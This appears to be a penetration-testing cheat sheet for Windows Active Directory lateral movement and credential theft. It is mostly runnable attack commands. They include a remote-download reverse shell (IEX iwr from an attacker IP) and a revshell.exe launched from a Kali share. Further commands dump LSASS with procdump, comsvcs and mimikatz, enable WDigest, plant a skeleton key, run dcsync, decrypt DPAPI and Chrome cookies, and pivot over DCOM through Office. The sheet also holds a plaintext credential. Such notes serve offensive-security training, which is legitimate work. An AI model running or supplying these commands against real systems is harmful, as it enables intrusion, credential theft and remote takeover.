If you obtain the shell through pass the hash or pass the ticket, you perform a network login, which means you run into the Kerberos double hop issue.
The way around it is to perform an interactive login, but that requires the clear text creds.
Psremoting uses pass the ticket. It’s how Kerberos is meant to work and a limitation - it’s actually the entire reason Kerberos delegation was invented.
Often the simplest way is to perform process migration/injection into a system process and perform actions from that, as that acts in the context of the computer account which did a interactive login at startup
$username = 'devmanager'
$password = 'F0rRunning$cheduledTasks!'
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
Invoke-Command -ComputerName CASC-DC1.CASCADE.LOCAL -Credential $credential -scriptblock {powershell.exe -c "IEX(iwr http://10.10.14.22/Invoke-PowerShellTcp.ps1 -UseBasicParsing)" }
#Invoke hostname on 3rd server
$cred = Get-Credential Contoso\Administrator
Invoke-Command -ComputerName ServerB -Credential $cred -ScriptBlock {
Invoke-Command -ComputerName ServerC -Credential $Using:cred -ScriptBlock {hostname}
}
#Port forwarding from host to Target's WinRM
netsh interface portproxy add v4tov4 listenport=5446 listenaddress=10.35.8.17 connectport=5985 connectaddress=10.35.8.23
netsh advfirewall firewall add rule name=fwd dir=in action=allow protocol=TCP localport=5446
Enter-PSSession Session1 -Credential domain\user
#Ref:https://posts.slayerlabs.com/double-hop/
#Creates a new session configuration on the remote computer
#when connected, forces it to always run with the credential provided.
Invoke-Command -ComputerName <Hop1PC> -ScriptBlock { Register-PSSessionConfiguration -Name Creds -RunAsCredential <domain-name>\<domainaccount> -Force }
Invoke-Command -ScriptBlock {\\<Kali-IP>\revshell.exe 10.10.x.x 4445} -Credential <Hop1PC> -ConfigurationName Creds
#Run a process as a different user
$secpasswd = ConvertTo-SecureString "<pass>" -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential ("<domain\username>", $secpasswd)
$computer = "<COMPUTER_NAME>"
Start-Process powershell.exe -Credential $Using:mycreds -NoNewWindow
#Troubleshoot
$s = New-PSSession -Credential $mycreds
Invoke-Command -Session $s -Scriptblock {whoami}
#Enable RDP on target
#1.Add yourself to the remote desktop users group
#2. Enable on target using Powershell
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
#3.Execute from a shell. Do not execute from PSRemoting session.
#If you execute the following commands from a Remote Powershell session, you will be disconnected because we set the RDP listen port to 5985,
#so we will have to sc.exe stop WinRM before running Remote Desktop Service
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "UserAuthentication" -Value 1
Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\" -Name PortNumber -Value 5985
sc.exe stop WinRM
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
#Runas
runas /netonly /user:garrison.local\Administrator powershell.exe
psexec
Required CIFS ticket on target.
Requires manual deletion using sc
#psexec. Drops into NT Authority/SYSTEM
psexec.py BLACKFIELD.local/<user>@<IP> -hashes ":<NT hash>"
#Execute local executable on remote system
psexec.exe \\REMOTECOMPUTER –i -c <localfile.exe> /accepteula
#Execute as SYSTEM
psexec -s cmd
#enable PSRemote remotely
$computerName = 'REMOTECOMPUTER'
psexec "\\$Computername" -s c:\windows\system32\winrm.cmd quickconfig -quiet 2&>&1> $null
#OR
PowerShell Remoting
Enabled by default on Server 2012 onwards. Used my Administrators.
Uses HTTP port TCP 5985[Based on WinRM] {This is encrypted traffic} | 5986:SSL
Requires admin privileges on target machine.
Tip: This can be an enumeration technique.
May need to enable remoting (Enable-PSRemoting) on a Desktop Windows machine, Admin privs are required to do that.
The LSA, which includes the Local Security Authority Server Service (LSASS) process, validates users for local and remote sign-ins and enforces local security policies. LSA Protection prevents non-protected processes from interacting with LSASS. Mimikatz can still bypass this with a driver
Run Powershell as Administrator
Using the code from ReflectivePEInjection, mimikatz is loaded reflectively into the memory. All the functions of mimikatz could be used from this script.
#Ways to dump credentials from memory
--
-Dumping LSASS from Task Manager
get-process lsass
tasklist | findstr lsass
procdump.exe -accepteula -ma “lsass.exe” out.dmp
procdump.exe -accepteula -ma 580 out.dmp
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump [PID] C:\temp\out.dmp full
crackmapexec smb 192.168.0.76 -u testadmin -p Password123 --lsa
#From Windows
sekurlsa::minidump c:\lsass.dmp
log lsass.txt
sekurlsa::logonPasswords
#From Linux
pypykatz lsa minidump lsass.DMP
--
#Enable WDigest to store clear-text credentials
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
sekurlsa::wdigest
sekurlsa::logonpasswords
privilege::debug
sekurlsa::logonpasswords
sekurlsa::tickets /export
kerberos::ptt <file>.kirbi
misc::skeleton
lsadump::lsa /inject
token::elevate
lsadump::sam
lsadump::secrets
lsadump::trust /patch
lsadump::lsa /patch
lsadump::dcsync /user:dcorp\krbtgt
#Cached logons. Can’t perform “pass-the-hash” style attacks with this type of hash.
"token::elevate" "lsadump::cache"
hashcat -m2100 '$DCC2$10240#<NAME>#<HASH>' /usr/share/wordlists/rockyou.txt --force --potfile-disable
#Restore NT hash of a user
lsadump::setntlm /user:<user> /ntlm:<hash>
#Export private certificates
Invoke-Mimikatz –DumpCerts
#SSP Attack: Store passwords of all logins in clear-text to c:\Windows\System32\mimilsa.log
"privilege::debug" "misc::memssp"
-----
#Credential Manager
#Extract credentials from Credential Vault from "\AppData\Local\Microsoft\Vault"
"vault::list"
#Extract credentials from Credential Vault from "\AppData\Local\Microsoft\Credentials"
"vault::cred"
#List plain-text creds [Risky]
"vault::cred" /patch
-----
#DPAPI Abuse
dir /a c:\Users\<username>\appdata\local\microsoft\credentials\<Credential file>\
#Copy Master Key
dpapi::cred /in:c:\Users\<username>\appdata\local\microsoft\credentials\<Credential file>\
#Grab GUID Master Key value
dir /a c:\Users\<username>\appdata\roaming\microsoft\protect\<GUID Master key value>
#Grab Master Key to Decrypt
dpapi::masterkey /in:c:\Users\<username>\appdata\roaming\microsoft\protect\<GUID Master key value> /rpc
#Decrypt
dpapi::cred /in:c:\Users\<username>\appdata\local\microsoft\credentials\<Credential file> /masterkey:<Key value from above command>
--
#Dump Domain-wide DPAPI Backup Key from DC
lsadump::backupkeys /system:<DC> /export
#Decrypt target user's master key using DPAPI Backup key
dpapi::masterkey /in:"<User-master-key>" /pvk:"Domain-backup-key"
#Decrypt cookie values with target user's master key
dpapi::chrome /masterkey:<user-master-key> /in:<Path-to-chrome-cookies>
--
#Crack masterkey with user's clear-text pass
dpapi::masterkey /in:<Users-key> /sid:<User-SID> /password:<password> /protected
#Without knowing the password, but with code exec, extract domain key from DC
dpapi::masterkey /in:"%appdata\Microsoft\Protect\<SID>\<Master-key-GUID> /rpc
#Decrypt credentials from Windows Vault using master key
dpapi::creds /in:<creds> /masterkey:<masterkey> /unprotect
Over Pass The Hash
Obtain Kerberos tickets from NTLM hash.
An attacker can leverage the NTLM hash of another user account to obtain a Kerberos ticket which can be used to access network resources. This can come in handy if you are only able to obtain the NTLM hash for an account, but require Kerberos authentication to reach your destination.
Likely to cause an alert since the encryption method of the EncryptedTimestamp field in AS_REQ is being downgraded.
To make this attack stealthier, use NTLM + AES keys [aes256_hmac + aes128_hmac]
aes128 keys can be specified even if they do not actually exist.
DCOM is performed over RPC on TCP port 135 and local administrator access is required to call the DCOM Service Control Manager, which is essentially an API.
Requires LA privileges on target.
Requires the presence of Microsoft Office on the target computer.
#Outlook
Reference: https://enigma0x3.net/2017/11/16/lateral-movement-using-outlooks-createobject-method-and-dotnettojscript/
$com = [Type]::GetTypeFromProgID('Outlook.Application’,’192.168.99.152’)
$object = [System.Activator]::CreateInstance($com)
$RemoteScriptControl = $object.CreateObject(“ScriptControl”)
#Compiling the “payload” in C#, & pass it to DotNetToJScript. Save output to $code
$RemoteScriptControl.Language = “JScript”
$RemoteScriptControl.AddCode($code)
#Excel: Create a macro-enabled excel docm
Reference: https://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/
$com = [activator]::CreateInstance([type]::GetTypeFromProgId("Excel.Application","<Remote-IP>"))
$LocalPath = "C:\Users\jeff_admin.corp\myexcel.xls"
$RemotePath = "\\192.168.1.110\c$\myexcel.xls"
[System.IO.File]::Copy($LocalPath, $RemotePath, $True)
$Path = "\\192.168.1.110\c$\Windows\sysWOW64\config\systemprofile\Desktop"
$temp = [system.io.directory]::createDirectory($Path)
$Workbook = $com.Workbooks.Open("C:\myexcel.xls")
$com.Run("mymacro")
PSScript: https://gist.github.com/enigma0x3/8d0cabdb8d49084cdcf03ad89454798b
Invoke-ExcelMacroPivot -Target "192.168.99.152" -RemoteDocumentPath "C:\Book1.xlsm" -MacroName "Auto_Open"
#PowerPoint: Create a PowerPoint add-in from this content, you must save as either a PPA / PPAM file
Reference: https://attactics.org/2018/02/dcom-lateral-movement-powerpoint/
PSScript: https://github.com/attactics/Invoke-DCOMPowerPointPivot/blob/master/Invoke-DCOMPowerPointPivot.ps1
$com = [activator]::**CreateInstance**([type]::**GetTypeFromProgId**("PowerPoint.Application", "10.10.10.10"))
$addin = $com.AddIns.**Add**("c:\testfile.ppam")
Once port forward is set up to the attackers host, gss-api proxy enabled us to hijack the victim's active kerberos tickets to access intranet sites.
#May need to bypass UAC initially
https://github.com/mikkolehtisalo/gssapi-proxy
Firewall Rules Modification
netsh advfirewall firewall add rule name="NAME" dir=in action=allow protocol=tcp localport=PORT
#Metasploit
use multi/manage/autoroute
#Reverse port forward.
run portfwd -R -p <Remote pivot port> -l <Local port to listen on> -L <Local Host IP to listen on>
#Set up SOCKS proxy [/etc/proxychains.conf]
use auxiliary/server/socks4a
to same as -l
Establish reverse connection to Attacker's SSH server to create an SSH tunnel.
gedit /etc/ssh/sshd_config
Plink.exe is a Windows command line version of the PuTTY SSH client. Now that Windows comes with its own inbuilt SSH client, plink is less useful for modern servers.
Transfer binary to the target
Use it to create a reverse connection.
cmd.exe /c echo y | .\plink.exe -R LOCAL_PORT:TARGET_IP:TARGET_PORT USERNAME@ATTACKING_IP -i KEYFILE -N
Keys will not work properly here. Convert from id_rsa to KEY.ppk
The resulting .ppk file can then be transferred to the Windows target and used in exactly the same way as with the Reverse port forwarding taught in the previous task (despite the private key being converted, it will still work perfectly with the same public key we added to the authorized_keys file)
